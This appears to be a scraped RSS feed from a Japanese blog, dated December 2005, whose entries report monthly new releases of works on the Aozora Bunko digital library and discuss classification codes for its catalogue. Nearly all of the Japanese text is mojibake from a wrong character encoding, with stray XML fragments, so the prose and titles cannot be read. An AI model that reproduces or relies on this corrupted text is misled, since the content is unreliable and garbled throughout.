    ¡¡¥ׁ¥ך÷׳₪־ֶ¡£··מ£±£´ֶ¡ֻ₪ֻ₪ֿ¡¢²¬ֻ₪«₪־»ׂ¡ײֳַ־₪÷׳¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡££··מ£·ֶ₪ֻ₪ֿ¡¢´ִֵ¹ס»־¡ײֶֻ₪ְֻ¸₪ל₪¿°¾ו₪ֿ¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¡ײֶֻ₪ְֻ¸₪ל₪¿°¾ו₪ֿ¡׳₪עֶֹ₪ף₪ַ₪₪₪כ₪ָ¡¢£µ£°ַ¯°¾ו·׀₪ֳ₪ֶ₪ג¡¢ֶֻ₪ָ₪₪₪¦¹ס₪ֿ¡¢°­₪₪°ױּ£₪ַ₪¢₪₪ךׁ₪ֳ₪ֶ₪₪₪₪₪₪ט₪¦₪ֻ»׳₪¦¡£

    - -

    ¡¡÷ףְֲֿ÷₪־»ם½¸₪¬£³׃¡ְִַ­¡¢½ד¾נ¾®¶½¸¡¢ִ³₪עּ´₪א¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¡ײְִַ­¡׳₪ֻ₪ֿ¡¢ֹםֿ¿₪ָ₪·₪ֶ¡ײ¼«ֽ³»ם₪־¥ך¥÷¥א₪ֻ½¢₪ֶ¡׳₪¬₪ִ₪₪₪ֶ₪₪₪כ¡£ֻ³ֵ×₪»ם₪ֻ₪ִ₪₪₪ֶ₪־÷ףְֲֿ÷₪־¸¸¥₪ֿ¡ײ»ם₪־¸¶ֽ‎¡׳₪¬¹»ְµֳז₪ַ₪¢₪כ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿ¹ס»»ֻֿ÷₪¬£´÷מֹ¡·ל₪ּ₪י₪ל₪¿²ֵב¡¢ְµְד₪־°ה½ס¡¢ּר±ִָכֿ¿₪«₪ִ₪¨ֲ¢¡¢ֱ°µ­ֵ·ֻ‏¾ֶ¡ֻ¡¢µֲפ¸­¼£₪¬£³÷מֹ¡₪ָ₪ֳ₪³₪₪ָ₪י»ׂ¡¢₪₪ב₪ָ₪³»³₪־·§¡¢÷׳₪־ָױ¡ֻ¡¢»ִֵֶֹׂ§₪¬£³÷מֹ¡¥´¥כ¥ױ¿ן¹װµ­¡¢»¨µ­ִ¢₪ט₪ך¡£±¡־¡פ¡ײ£±¡׳₪ֿ¥ם¡¼¥¿פ»ת¡¢1-13-21¡ֿ¡ֻ¡¢»¥ֻ₪₪ַ¡ֻ¡¢¿·ָ‏ֶמµָ₪¬£³÷מֹ¡₪¦₪¿»‏·׳¡¢₪₪₪¡¢₪«₪ײ₪ֳָמ¡ֻ¡¢²¬ֻו÷ֶ²₪¬£±÷מֹ¡ִה¼ײ¾ל₪־¾¯½ק¡ֻ¡¢¼ןִֵ»³ֶ¬²׀₪¬£±÷מֹ¡»ֽ¹ס׳ֿ©ֶµ­¡ֻ¡¢ְµ²¬»ׂµ¬₪¬£±÷מֹ¡ֻֿ½ֱ°לֵ©¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£²¬ֻו÷ֶ²₪־¡ײ¶בֲו°ֵֽװ¡׳₪ֿ¡¢¿½ס¥«¡¼¥ֹ₪ֲֻ¾₪־÷מֹ₪״₪־¥ך¥ף¥¯₪¬₪¢₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£
    -

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-19T07:18:52+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£¸·מ¹ז -http://www.siesta.co.jp/aozora/archives/002444.html - -£²£°£°£µַ¯£¸·מ₪ֿ¡¢£¶£²÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¥ֻ¥ו¡¼¥¹₪ֳֶֿ₪ֻ₪₪·¡£
    -

    ]]> -¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£¸·מ₪ֻ₪ֿ¡¢£¶£²÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ²¬ֻו÷ֶ²₪ָ־׃ֹחָ‏»ׂ₪ַ¡¢₪½₪ל₪¾₪ל£±£³÷מֹ¡£

    - -

    ¡¡²¬ֻו÷ֶ²₪ֿ¡¢¡ײ»°±÷ֿ·¿ְֽ־ֳֿ¡׳₪ָ¶בֲו°ֵֽ׃₪־£±£²÷מֹ¡ַעָ±µ´¡¢»״־״°ל₪ִ¡¢־¥÷²ֲֹ¡¢³₪µµ¡¢ֹ´×¸ל¡¢ֵַּֽ¡¢ֱּ¾₪־־¹¿ֽ¡¢₪³₪¸₪¡¢¿וµ´¡¢±ץעף¶ְ¡¢¾ג¥צ¥¡¢ְ¾±»¡ֻ¡£¡ײ»°±÷ֿ·¿ְֽ־ֳֿ¡׳₪ֿ¡¢ָ¾¼·ב×ִ¢₪ֶָ±₪¸·ֱ¼°₪ַ₪¢₪כ₪¬¡¢ב₪ך×₪ָ₪ֿ´״·¸₪־₪₪₪¹«ֳּ₪ָ¸ֶ₪ײ₪₪­ֶגֶֽ₪ַ₪¢₪כ¡£¶בֲו°ֵֽ׃₪ֿ¡¢²ֶ¸‏₪­₪־ֳֿ₪«₪י´¨₪₪÷ֳַז₪־ֳֿ₪₪ַ¡¢₪₪₪ם₪₪₪ם₪²רֳּ₪¬₪½₪ם₪ֳ₪ֶ₪₪₪כ¡£¶בֲו°ֵֽ׃₪ֻ₪ֿ¡¢ֲ¾₪ֻ¡ײִה¼ײ¾ל₪־¾¯½ק¡׳¡¿·»ת¿·²¾ּ¾¡¢¿·»תµל²¾ּ¾¡ֻ¡ײ±ֶ₪עֶ§₪₪ל₪¿½ק¡׳¡ײ·מ₪־ּכ₪¬₪¿₪ך¡׳¡ײ°ֵֽװ¡׳₪¬₪¢₪כ¡£

    - -

    ¡¡־׃ֹחָ‏»ׂ₪ֿ¡¢¡ײ°¦₪¹₪כ¿ֳֽ£¡׳¡ײִ«ֽ¼¡׳¡ײ°¿₪כ½ק¡׳¡ײ₪×ֹד₪µ₪ף¡׳¡ײ¸¼´״₪־¼ךִ¡¡׳¡ײ¹¬¡₪־ָא‎¡׳¡ײ»ׂ¶¡₪¿₪ֱ¡׳¡ײ÷§´¡׳¡ײ½©²ּ¡׳¡ײ½¢¿¦¡׳¡ײְ¶½₪´ֱֳֿ¡׳¡ײֳ«´ײ₪«₪י₪־¼ך»ז¡׳¡ײִב₪־ֵ«¡׳₪־£±£³÷מֹ¡£

    - -

    ¡¡³₪ּמ½½»°₪ֿ£¶÷מֹ¡¶ץֳז¯ט¡¢²ץ₪ל₪¿¥׀¥ך¥³¥ף¡¢»¦¿ֽ₪־³¶¡¢ֵֵµ₪´ִַָ₪־¿ְ·׀¡¢ֵֵµ₪ֹקֿ₪₪־²ר»א»צ·ן¡¢¥ֽ¥×¥ף²£ֳת»¦¿ֽ»צ·ן¡ֻ₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¿הֽ‎¾®ְג₪ע°ױ¼±₪·₪ֶ₪₪₪כ₪־₪ֿ¡¢₪ן₪«₪כ₪־₪ְ₪±₪ל₪ֹ¡¢¥ָ¥ך¥ֳ¥¯₪¬₪ֱ₪ח₪ֳ₪ָ¡ִ¡ִ₪ָ₪₪₪¦÷מֹ₪ג₪¢₪כ¡£¡ײ»¦¿ֽ₪־³¶¡׳₪־₪ט₪¦₪ֵֽ₪·₪₪ּ£₪ן₪₪₪־÷מֹ₪ָ₪·₪ֶ₪ֿ¡¢ֻׂ°ןַֿ₪¬£´÷מֹ¡¾ו³₪₪µ₪ל₪¿ֳֻ¡¢ֹסַֿ¡¢½ץ¸ֿ÷ֽ¾÷ב¡¢ּכµ¥¼ײ¡ֻ¡¢ּ´ּמµ׳÷מ₪¬£±÷מֹ¡»ֶבֶ₪־ֲ¡ֻ¡¢¸ר³«₪µ₪ֶ₪₪₪כ¡£

    - -

    ¡¡£¸·מ£±£µֶ₪־¼‏ױ₪ַ₪ֿ¡¢µֹֻ´¹ח»ׂ¡ײ¹צֳז₪״₪־¼ך»ז 12 °ל¶ו»ֽ¸ַ¯¡¾¼ֲֶֿף½½ַ¯¡ֻ¡׳¡¢¶ְֽ¸ֽס¹¡ײְש₪¸µֽ₪ב₪ל₪׀¡׳¡ײ²³״ֵ׿·¹µ­¼װ¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£°ל¶ו»ֽ¸ַ¯¡¾¼ֲֶֿף½½ַ¯¡ֻ₪־£¸·מ£±£µֶ₪ע₪ג₪ֳ₪ֶ¡¢¡ײ¹צֳז₪״₪־¼ך»ז¡׳₪ֿ½×₪ן₪כ₪־₪ַ₪¢₪כ¡₪³₪־°ױּ£¡¢₪ן₪«₪ך₪₪¹₪ט₪ֽ¡ֻ¡£₪₪¿¡¢¶ְֽ¸ֽס¹₪־¡ײ²³״ֵ׿·¹µ­¼װ¡׳₪ֻ₪¢₪כ₪ט₪¦₪ףֶ»₪¬²ּ₪¿₪·₪ֶ¸½ֲו₪ַ₪ֿ₪µ₪ל₪ֶ₪₪₪כ₪־₪ְ₪ם₪¦₪«¡¢¹ֽ₪¨₪ֶ₪₪כ²ֱֳֽ₪ֿ₪¢₪כ¡£

    - -

    ¡¡ֻּץ₪ֿ¡¢¥ֱ¥§¡¼¥¥ױ₪־£²÷מֹ¡¡ײ»ׂ¼י₪ִ»ׂ¡׳¡ײ₪ֶ₪¬₪¡׳¡ֻ₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£־כּ»°½ֵµָ₪־¼ך₪ֻ₪ט₪כֻּץ₪ַ₪¢₪כ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿ¿¹²×³°₪¬£³÷מֹ¡²×³°µש»ֻ₪ָ₪ֳֿ¯₪¾¡¢²ְֶּ׀ְֿ¡¢Resignation ₪־ְג¡ֻ¡¢µֳֶ׃´²₪¬£²÷מֹ¡ַ¼ֶ¦¹חְן¡¢₪¢₪כ¹³µִ½ס¡ֻ¡¢µֲפ¸­¼£₪¬£±÷מֹ¡¶ה²ֵֿ´ֶ»₪־ּכ¡ֻ¡¢ֱִֵֹׂ´»°₪¬£±÷מֹ¡³״ְ¸₪ֶָֹ½ס¡ֻ¡¢ִֵָ×½₪°לֿ÷₪¬£±÷מֹ¡ִ»±©²ָ₪־»ׂ¶¡¡ֻ¡¢ֵֿױ²¹₪¬£±÷מֹ¡¼»־₪ָ½קֽ¥¡ֻ¡¢¡ִֵ±ׁ»ׂ₪¬£±÷מֹ¡¾×₪־ָ¾ְ¸³¶¡ֻ¡¢¸¶ּ±´מ₪¬£±÷מֹ¡²ֶ₪־²ײ¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-19T06:01:30+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£¹·מ¹ז -http://www.siesta.co.jp/aozora/archives/002443.html - -£²£°£°£µַ¯£¹·מ₪ֿ¡¢£´£²÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¥ֻ¥ו¡¼¥¹₪ֳֶֿ₪ֻ₪₪·¡£
    -

    ]]> -¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£¹·מ₪ֻ₪ֿ¡¢£´£²÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ־׃ֹחָ‏»ׂ₪ַ¡¢£¹÷מֹ¡ֶֹ¡¢¾®₪µ₪₪²ײ¡¢רֿ²ִג¼ח¿ֽ¡¢ֻא¼‏¸׀µ×¹װ¡¢אץאןָ׳¡¢¡ײ¥ך¥י¡׳₪־½קֳ£¡¢ֽֽמ¡¢ֲ¿ֻאְמ¡¢ּכ¡¡ֻ¸ר³«₪µ₪ל₪¿¡£¡ײֻא¼‏¸׀µ×¹װ¡׳₪ֻּֿ³₪ֶ»₪־־¹₪־µ­ֿ¿¡£¡ײֲחֵח¹װ¡׳₪₪ֹ¡¢°³°₪ָ־׃ֹחָ‏»ׂ₪־µ×¹װ¸₪ֲֿ¿₪₪¡£

    - -

    ¡¡¼¡₪ֲֻ¿₪«₪ֳ₪¿₪־₪¬¡¢µ¸¶¹¸°לֿ÷₪ַ£¶÷מֹ¡¹§¹װף¨₪־ֳֿ¡¢½¦₪¦₪¿´§¡¢־µµ₪־¸₪¡¢°­ֻג₪־ָר¡¢¼״₪₪₪ֱ₪´¡¢ֶ¦¾®ֱ־₪־ֱֻ¸±¡ֻ₪־ֶ¸ֳֿ₪¬¸ר³«₪µ₪ל₪¿¡£

    - -

    ¡¡ֻּץ₪ַ₪ֲֿח÷מ¡¢¥¢¥ף¥ַ¥כ¥»¥ף¡ײֲ¨¶½»ם¿ֽ¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£¿¹²×³°₪ֻ₪ט₪כֻּץ₪ַ₪¢₪כ¡£

    - -

    ¡¡¡ײֶֻµ×¹װ¸³״ֱ´½¸¡׳₪עִלֻ₪ֻ¡¢ֶֻֻּװ₪«₪י£´׃¡¢ְ¾ֶֻװ₪«₪י£µ׃₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£ֶֻֻּװ₪ֿ¡¢־׃ֹחָ‏»ׂ¡ײֻא¼‏¸׀µ×¹װ¡׳¡¢´הּמֻ¢ִּ¡ײֶ¹ג½½¾¡₪־µ­²±¡׳¡¢ֵחּ·ע÷מ¡ײֵל°°ְמֲ¼₪ֻ₪ֶ¡׳¡¢ֱֶֹיֳ²ײ¡ײ·§₪־ֲ­ְ׳¡׳₪ַ₪¢₪כ¡£ְ¾ֶֻװ₪ֿ¡¢£±£°·מ¸ר³«₪־÷מֹ₪ע¹ח₪ן₪»₪ֶ¡¢¶ב¾¾½©¹¾¡ײ°ֻ²ל¡¢°ְֻ×ֿ©¡׳¡¢¶ב¾¾½©¹¾¡ײ°ֻ²ל¹ס¡׳¡¢¶ב¾¾½©¹¾¡ײ¸׀¸קֵח±ֶ¡׳¡¢ּ²¼ְֲּֿ÷¡ײµ‏÷ו¹¸«ֿ¿¡׳¡¢ּ²¼ֽר¸¼¡ײ»³±¢₪־ֹק·¡׳¡¢ֵח÷ךֶ£ֲ¼¡ײ»³±¢ֵ»÷¡׳₪ַ₪¢₪כ¡£

    - -

    ¡¡₪₪ל₪׃₪ָ¥׳¥ם¥¸¥§¥¯¥ָ¡¾÷₪ֿ₪³₪ֱ₪י¡ֻ₪«₪י₪ֿ¡¢£²÷מֹ₪¬ֵ׀ֿ¿₪ַ₪¢₪כ¡£ְ¸‎¿®ֹ׳¡ײ¸ֲֵו₪ֻ±ק₪±₪כ¸ְ¸לֱֵ¾µ₪־¿ה°¡׳₪ָ¡ײ¾ֲ«₪«₪י´ת₪µ₪·×₪״¡׳₪ַ₪¢₪כ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ּֿ´ּמµ׳÷מ₪¬£³÷מֹ¡¼׀¹£¡¢¹ץַע¥¹¥ָ¡¼¥ך¡¼¡¢־₪־¥¢¥ך¥׀¥₪¡ֻ¡¢ֲֻּ¼ֶ©ֳ«₪¬£²÷מֹ¡÷ב₪ָָ³¡ֶגִֵֹװֳ־°ֳּץ¡ֻ¡¢¡ײ÷ב₪ָָ³¡׳₪־»¦¿ֽ÷ב¡ֻ¡¢³₪ּמ½½»°₪¬£²÷מֹ¡¶ץ½±·ף¡¢₪¯₪ם₪¬₪ֵֽ·¶י¡ֻ¡¢ֱִֵֹׂ´»°₪¬£²÷מֹ¡³״ְ¸₪ָ¶µֽ¡¢³״ְ¸₪ְָ¸³ט¡ֻ¡¢ֳµ׳ּ´ֶף₪¬£²÷מֹ¡÷ש₪µ₪¯ֵח ½ױ₪־₪«₪ֿ₪¿₪ל¡¢÷ש₪µ₪¯ֵח ¸«ֳ־₪י₪ְּ₪³¦¡ֻ¡¢µֲפ¸­¼£₪¬£±÷מֹ¡³״¼װ¥¢¥י¥א¥ֿ¥י¥ֹ₪־¸«₪¿ֳוסֻ¡¢»³²¼ֽר»°ֿ÷₪¬£±÷מֹ¡־®ֵ¾¡ֻ¡¢¾®½®¾¡ֶף₪¬£±÷מֹ¡ָג₪ֿ¸ל₪י₪÷¡ֻ¡¢ֳִֵז¹׳ְֲֿ÷₪¬£±÷מֹ¡־׸ל¡ֻ¡¢ֶגִֵֿ¥°ֳ₪¬£±÷מֹ¡¸₪׸ל¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-19T04:27:49+09:00 -
    - -²ֶֿ¸₪־²¸ײ₪· -http://www.siesta.co.jp/aozora/archives/002441.html - -ְִ¶ץ¸¸ָֻף¸רַ§¡¡¬־אָײ¹ז¥ױ¥ך¥ױ¥ך·׳²ט
    -

    - -

    ₪³₪³₪ֿ¡¢₪₪÷₪¿₪₪ך₪ע־ר₪·₪¬₪כ²ֶֿ¸₪־₪¿₪₪ך₪׀¡£
    -¸ר³«ֳז¡¿÷מ¶ֳָז₪־÷מֹ₪ע¬־א¡¦ְֵ¸¡₪·₪₪¹¡£

    ]]> - - -

    1¡ֻ¸ר³«ֳז¡¿÷מ¶ֳָז¥ך¥¹¥ָ₪ע₪¨₪י₪ף₪ַ¡¢
    -2¡ֻ¬־א¥¥¹₪הּ₪¬־א₪־¹װ₪ע¥³¥װ¡¼₪·₪ֶ¡¢
    -3¡ֻ¹װֶ¬₪ְֻµ₪·₪₪¬־אָײ¹ז₪ע²‏₪ב₪ֶ¥ױ¥ך¥ױ¥ך₪·₪¿₪¦₪¨₪ַ¡¢
    -4¡ֻ¸ר³«ֳז¡¿÷מ¶ֳָז₪₪₪÷₪ל₪«₪עְּ¼¨₪·₪ֶ¡¢
    -5¡ֻ₪³₪־¥¡¼¥¸₪״₪×½ס₪­₪³₪₪¯₪ְ₪µ₪₪¡£

    - -

    ₪³₪ל₪₪ַ₪־÷מ¶ָ‎¿ֻ₪ָ₪×₪₪¨₪¬₪­
    -¢¨ ²ֶֿ¸₪־¸׳₪־´¬ ֲ¶₪־°ל¡§aozora blog¡§¥¸¥ד¥ף¥כּ₪ֿ״ֽר¡×
    -¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡ ֲ¶₪־ֶף¡§ֶֻ½½¿¬־א¡NDC¡ֹֻ½
    -¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡ ֲ¶₪־»°¡§ְִ¶ץ¸¸ֻ ¬ּמּ¥ך¥¹¥ָ
    -¢¨ »שֶ¸¿½ס₪ֿ¡¢₪¢₪¿₪₪ֻ¡ײK¡׳₪ע¥ױ¥ך¥ױ¥ך¡£
    -¡¡ ÷מֹ¿פ₪¬¾¯₪₪₪₪־₪ַ¡¢ְׁ¶ֵֻ×₪ֻ»שֶ¸¿½ס₪ֻ¬־א₪·₪ֶ₪₪¹¡£
    -¢¨ £¿פ₪־¬־אָײ¹ז₪ע₪ױ₪כ₪ָ₪­₪ֿ¡¢ָ¾³ׁ¥¹¥¡¼¥¹₪ַָײ¹ז₪ע₪ן₪±₪כ¡£
    -¢¨ ¾®¿פְֵ°²¼₪₪ַ¥ױ¥ך¥ױ¥ך₪ג₪ט₪·¡£
    -¢¨ ₪¿₪ָ₪¨₪׀¡¢¥¢¥ף¥ַ¥כ¥»¥ף₪ה¥ב¡¼¥ֶ¥כ¥ך¥ף¥¯₪ה¥₪¥׳¥»¥ף₪־₪ט₪¦₪ֻ¡¢
    -¡¡ ¹סְׂ₪₪ֹ¬־א₪¬ַ÷₪₪·₪₪₪ָ₪­₪ֿ¡¢
    -¡¡¡¡ NACSIS Webcat ֱם¹חּֿ¿¥ַ¡¼¥¿¥¡¼¥¹WWW¸¡÷ק¥µ¡¼¥׃¥¹
    -¡¡ ₪³₪³₪ַ¥¢¥ף¥ַ¥כ¥»¥ף₪₪ך¥ב¡¼¥ֶ¥כ¥ך¥ף¥¯₪₪ך₪ע¸¡÷ק₪·₪ֶ¡¢
    -¡¡ µ­ֶ‏₪·₪ֶ₪¢₪כNDCָײ¹ז₪ע»²¹ֽ₪ֻ¥ױ¥ך¥ױ¥ך¡£
    -¢¨ ֹװ°ֲ¡¦µ¿ּה₪₪ָ₪­₪ֿ¡¢₪¢₪¿₪₪ֻ¡ײ?¡׳₪ע¥ױ¥ך¥ױ¥ך¡£
    -¢¨ ְִ¶ץ¸¸ֻ₪־÷מֹ₪ֿ¡¢₪₪₪ם₪₪₪ם₪ֱ´½¸₪עִלֻ₪ֻ₪·₪ֶֶ‏־ֿ₪·₪ֶ₪¢₪ך₪₪¹₪¬¡¢
    -¡¡ ¸ִ¡¹₪־÷מֹ₪ֻ¬־א₪ע₪ִ₪±₪כ¾ל¹ח₪ֿ¡¢¡ײֱ´½¸¡׳₪ָ₪₪₪¦¬־א₪ַ₪ֿ₪₪¯¡¢»ם₪₪י»ם¡¢
    -¡¡ ¾®ְג₪₪י¾®ְג₪ָ₪₪₪ֳ₪¿¸ִ¡¹₪־÷מֹ₪־¼חֲך₪ֻ₪¢₪ֳ₪¿¬־א₪ֻ¥ױ¥ך¥ױ¥ך₪¹₪כ₪³₪ָ¡£

    - -

    ₪₪₪ף¡¬־אָײ¹ז¥ַ¡¼¥¿,ֳר¼װּ¾,÷מֹID,÷מֹּ¾¡¢₪־½ח¡ֻ
    -¡¡¡ֱ¸ר³«ֳז₪ט₪ך¡ֱ
    -911,ְִּ ±ֶֹ·,900,ּמְ­₪־¥»¥ם¥ך
    -913,³©ְמ ־µַ·²נ,69,²ֶֿ¸
    -K913,³©ְמ ־µַ·²נ,43014,¥¢¥°¥ֻ₪־¿ְ
    -?253 936,¥¸¥ח¥ף¥½¥ף ¥ך¥ף¥ֹ¥ף,3624,¥¢¥ב¥ך¥«ֲחֵ‎־־½¢ַ₪±יְג

    -¡¡
    -¡¡¸ר³«¡§2005.12.18
    -¡¡¹¹¿·¡§2005.12.21
    -¡¡₪·₪ְ₪ׂ₪ם₪·¡¿PoorBook G3'99
    -¡¡ֵ¾÷¡¦°תֽׁ¡¦¥ך¥ף¥¯₪ֿ¼«ֽ³₪ַ₪¹¡£

    ]]> -
    -book -PoorBook G3'99 -2005-12-18T18:55:10+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£±£°·מ¹ז -http://www.siesta.co.jp/aozora/archives/002421.html - -£²£°£°£µַ¯£±£°·מ₪ֿ¡¢£µ£±÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¼ח₪¥ֻ¥ו¡¼¥¹₪ָ₪·₪ֶ₪ֿ₪₪÷₪¿₪₪ך₪־ִ÷¿₪ְ₪ם₪¦₪«¡£
    -

    ]]> -¡¼ח₪¥ֻ¥ו¡¼¥¹¡
    -»ִַ°₪₪³₪ָ₪ְ₪±₪ֹ¡¢₪₪÷₪¿₪₪ך₪־ִ÷¿₪¬¼ח₪¥ֻ¥ו¡¼¥¹¡¾₪·₪¯₪ֿ₪³₪ֱ₪י¡ֻ¡£·ַ¼¨ִָ₪־÷£¸ו₪ֻ₪ִ₪₪₪ֶ₪ֿ¥ב¡¼¥ך¥ף¥°¥ך¥¹¥ָ₪ֳַֿ₪·¹ח₪₪₪¬¹װ₪ן₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£±£°·מ₪ֻ₪ֿ¡¢£µ£±÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ´ִֵ¹ס»־₪ַ¡¢£²£²÷מֹ¡¿··א±¿ֶ°₪־°ל¹ֽ»¡¡¢³₪₪־ֽ¶ַֿ¡¢ֳ₪¯₪ֿ₪₪₪¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 02 ¡₪½₪־ֶף¡ֻ¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 03 ¡₪½₪־»°¡ֻ¡¢ֻµ´ׁ¼װ₪־¸ְ¡¢¥¥×¥כ¡¦¥¨¥כ¥פ¥£¥ז¥¦¡¢ֻכ´ײ¡¢°¿₪כָדֹ¾¡¢²¾ּּ÷ֲ₪־ְכ¸ְ¡¢¥ײ¥כ¥¿¥¢¥ֻ¥ו₪־ְֱֵג₪ט₪ך¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 04 ¡₪½₪־»ֽ¡ֻ¡¢·אֳֵּ¡ֹ¾¡¢ֵח¹סֵ×ָ¸«¡¢¿´¿₪«₪₪ך¡¢ֽׁ¼־₪₪­´ׁµׂ¡¢°¿₪כֶ₪־ֶ°×±א¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 05 ¡₪½₪־¸¡ֻ¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 06 ¡₪½₪־ֿ»¡ֻ¡¢µ÷¶ֶף½½¸׃₪עֶֹ₪₪µ₪ל₪¿ֳֿ¡¢·½ׁ₪ָ¶גֱ¬¡¢¡״¥ֿ¥₪¥«¥י¡₪ָ₪₪₪ױ₪³₪ָ¡¢¡ֻ¡£¡ײ´ִֵװ¢»־ֱ´½¸¡¡20¡׳₪ֻ¼‎ֿ¿₪µ₪ל₪¿ֲחְµֻצ₪«₪י¾¼ֲֿ½י´₪־¿ןֹ®₪ַ₪¢₪כ¡£ִלֻ₪־¬־א₪ַ₪ֿ¡ײ¿ןֹ®¡׳₪ָ₪₪ֳ₪ֶ₪₪₪כ₪±₪ל₪ֹ¡¢¾®ְגֹק₪־¡ײ³₪₪־ֽ¶ַֿ¡׳₪ה¥ױ¥י¥ף¥¹₪־ְ־ֳֿ₪ע¼‎ֿ¿₪·₪¿¡ײ¥ײ¥כ¥¿¥¢¥ֻ¥ו₪־ְֱֵג₪ט₪ך¡׳₪₪ֹ₪₪₪ם₪₪₪ם₪ָ₪¢₪כ¡£¡ײ¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ¡׳₪־¡ײ₪½₪־°ל¡׳₪ֿ¡¢£²£°£°£µַ¯£±£²·מ£²£°ֶ₪ֻ¸ר³«ֽ½ִך¡£

    - -

